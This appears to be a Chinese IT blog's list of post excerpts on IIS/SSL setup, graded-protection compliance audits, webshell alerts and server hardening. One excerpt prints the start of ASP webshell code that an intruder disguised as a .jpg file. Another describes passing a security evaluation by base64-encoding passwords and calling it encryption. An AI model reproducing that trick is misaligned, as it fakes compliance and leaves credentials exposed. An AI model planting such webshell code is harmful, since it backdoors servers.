暂时先用这个名字

WebShell 是一种被攻击者用来在服务器上获得远程控制的恶意脚本。通常，它们被上传到受攻击的服务器上，并允许攻击者通过 Web 访问来执行任意命令。通常是恶意 PHP、ASP、JSP 或其他脚本文件。允许攻击者执行系统命令、查看文件、修改文件权限，甚至进一步感染服务器。经常隐藏在合法的网站中，通过网站漏洞上传到服务器。火绒的提示说明 httperr603.log 文件中记录了可疑的 WebShell 请求，但它只是日志中的记录，通常并不会直接导致服务器被感染。

阿里云、华为云等各路云都有ssl证书购买，价格相差不大，操作也都差不多，请自行选择。本文以阿里云操作为案例。

等保测评”全称是信息安全等级保护测评。是经公安部认证的具有资质的测评机构，依据国家信息安全等级保护规范规定，受有关单位委托，按照有关管理规范和技术标准，对信息系统安全等级保护状况进行检测评估的活动。本文陆续将遇到的情况进行记录。

之前写过一篇windows2008的安装方法，配置方法大同小异。这里再复习一遍。Windows Server 2016及更高版本的IIS内置了自己的证书管理器，不再需要安装和配置Active Directory证书服务，可以直接通过IIS Manager来管理服务器证书。使用IIS Manager可以方便地为IIS站点配置和安装SSL证书，也可以轻松地从各种证书颁发机构（CA）获取证书并将其绑定到IIS站点上。

研究了一天，都是从账号密码的问题上去想，重写了密码不行，重配了堡垒机也不行~~但其实这个情况主要是服务器身份验证引起的，需要服务器端修改组策略。

重要节假日期间，对于网络安全将更升级，而平时都是由安全公司来进行检测，那么如何对自己的系统进行初级扫漏呢？

什么是JWT？JSON WEB TOKEN，json格式的网络令牌，所以JWT只是一种token形式，可用来解决传统session的一些弊端。它本身和数据安全没有关系

客户网站用了windows自建的ssl搭建，开始没问题，某天之后本地127.0.0.1上传正常，但外网上传仅限几十K的文件，超出则提示：错误：413；响应：“未显示页面,因为请求实体过大。”一度以为是防火墙的问题，排查未果。今天终于解决问题，整理如下：一、原理官方说明：Client cannot renegotiate request and returns an HTTP 413 error如果 Web 服务器、网站或站点的单个目录或文件上启用了客户端证书，则客户端在上载较大的文件时.

一、概述Windows+IIS的环境下，任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响。Http.sys 是一个位于 Windows 操作系统核心组件，能够让任何应用程序通过它提供的接口，以 Http 协议进行信息通讯。微软在 Windows 2003 Server 里引进了新的 HTTP API 和内核模式驱动 Http.sys，目的是使基于 Http

一、在windows下生成OpenSSL自签证书准备编译好的OpenSSL下载地址： http://slproweb.com/products/Win32OpenSSL.html此文下载的是64位的：Win64 OpenSSL v1.1.1k.EXE安装openssl到E盘，路径为：E:\openssl打开cmd.exe, cd到E:\openssl\bin下面：首先，生成服务器端的私钥(key文件):执行代码openssl genrsa -des3 -out root

按照等保要求，密码类的信息必须RSA加密后才能传递：需要对密码传输过程中进行加密方式传输。如采用md5加验或SM1、SM2、SM4、3DES、AES、RSA加密算法，同时也不要直接采用暴露在互联网上的md5、base64算法、URL编码转换。之前仅仅用base64来操作已是明文禁止了。思路还是一样的：“客户端使用js加密，服务端使用php解密”。比较两个客户端js插件：jsencrypt.js 和 jsrsasign 都可以实现加密解密，但 jsencrypt.js 更方便， jsrsa

1.安装CA证书服务器开始菜单 > 管理工具 > 服务器管理器选择左侧树形菜单“角色”节点，右键“添加角色”勾选“Active Directory 证书服务”，点“下一步”按钮点击“下一步”按钮点击“下一步”按钮，会弹出“添加角色向导”界面点击“添加所需的角色服务”按钮点击“下一步”按钮指定安装类型，选择“企业”，点击“下一步”按钮，企业：需要域环境独立：不需要域环境选择“根”，点击“下一步”按钮选择 “新建私钥”，点击“下一步”按钮选择加密服务提供程序：“

十年前的代码，虽然没有对外，但一直放在服务器上，今天整理一下，发现了一些好玩的。总体来说，黑客还是蛮良心的，只是攻破了，并没有干什么破坏的事。20081279747712.jpg看似一张图片，其实用记事本打开是一串asp代码<%Dim objfSo%><%Dim fdata%><%Dim objCountFile%><%on error resume next%><%Set objfSo = Server.CreateObject("Sc

最近在整理老的代码，漏洞一大堆；发现了有良心的黑客，上传了不干净的东西，但并没有操作什么。-警告提示如下：在您的系统磁盘上发现了一个可疑文件，它可能代表了是黑客成功入侵网站后种植的，建议您先确认文件合法性并处理。总体上，Webshell检测是根据文件行为威胁程度进行打分的，这个文件具备了一定的危险功能，本身具有一定的危险特征，但并不完全保证一定是一个网站后门，也可能是一些包含可以代码的正常网站文件，如果管理员自己部署放置的，可以在前台选择忽略或者标记为误报按钮。同时，如果被告警的文件是一个.log网站

安全计算环境-服务器操作系统当前密码为弱口令，且密码未定期更换解决参考：https://jingyan.baidu.com/article/219f4bf7d56880de442d38b9.html位置 ：控制面板 - 管理工具 - 本地安全策略 - 账户策略 - 密码策略配置 ：密码必须符合复杂性要求、密码长度最小值、密码最长使用期限操作系统未配置密码复杂度策略、登录失败处理策略、超时策略解决参考：https://www.cnblogs.com/XiaoZhou-cn/p/11385

客户的windows iis服务器安全报告提示ssl3.0、rc4等等不安全，需要关闭，如果自己懂的话，去注册表关闭即可。否则就下载一个小程序，利用软件推荐的可以快速关闭，当然，别忘了重启服务器。下载地址：https://www.nartac.com/Products/IISCrypto/Download如果要检测https网站是否安全，可以到以下的网站去试试。https://mys...

客户提出要求密码需要加密后传送，为了绕开软件的安全评测，我们采用了三聚氰胺绕蛋白质含量大法：客户端用jQuery_encode()，服务端php_decode()~~由于原页面并未采用ajax，因此采用的思路是：客户端利用jQuery获取密码输入控件的值，并使用js_encode()进行加密，并将加密后的值存入一个隐藏控件，该隐藏控件的name与原密码控件的name一致。服务端接受后利用php自带的base64_decode()解密。这样的话，代码改动是最小的。好了，上代码。javascri

1、 目标URL存在http host头攻击漏洞在代码部分注释_SERVER[“HTTP_HOST”]方法，仅留_SERVER["SERVER_NAME”]2、 会话cookie中缺少HttpOnly属性在代码部分开启HttpOnly在服务器开启httpOnlyCookies为True3、 目标X-Content-Type-Options响应头缺失在代码部分设置X-Content-Type-Options为nosniff在IIS设置X-Content-Type-Options为nosn

身份鉴别a）应对登录的用户进行身份标识和鉴别，身份标识具有唯一性，身份鉴别信息具有复杂度要求并定期更换；测评方法：使用如下命令查询账号select user,host,password from mysql.user； // 输出用户列表，查者是否存在相同用户名执行如下语句查询是否在空口令用：select * from mysql.user where length(password)= 0 or password is null；// 输出结果是否为空(针对5.6.6之后版